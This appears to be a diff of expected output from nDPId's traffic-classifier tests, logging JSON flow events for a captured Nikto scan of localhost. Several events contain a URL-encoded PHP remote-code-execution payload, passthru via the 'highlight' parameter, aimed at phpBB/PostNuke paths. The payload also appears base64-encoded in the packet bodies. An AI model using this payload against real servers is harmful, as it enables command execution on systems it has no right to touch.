+01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277772,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"ts_msec":1576420277773,"pkt":"AAAAAAAAAAAAAAAACABFAAFe9U5AAEAGRkl\/AAABfwAAAcbSH5CRq8xwNBHz4IAYAED\/UgAAAQEICp1m\/zWdZv81R0VUIC9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01019{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":1576420277773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00885{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_packet_id":1,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277776,"pkt":"AAAAAAAAAAAAAAAACABFAAFnAwdAAEAGOIh\/AAABfwAAAcbUH5DtkDois29dAoAYAED\/WwAAAQEICp1m\/zidZv83R0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01218{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00889{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_packet_id":1,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"ts_msec":1576420277777,"pkt":"AAAAAAAAAAAAAAAACABFAAFsiexAAEAGsZ1\/AAABfwAAAcbWH5BYorDPfm\/b94AYAED\/YAAAAQEICp1m\/zmdZv85R0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_packet_id":1,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277778,"pkt":"AAAAAAAAAAAAAAAACABFAAFmIsJAAEAGGM5\/AAABfwAAAcbYH5ANfxvlV0uU+oAYAED\/WgAAAQEICp1m\/zqdZv86R0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277778,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="}
-01026{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-01026{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
+01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
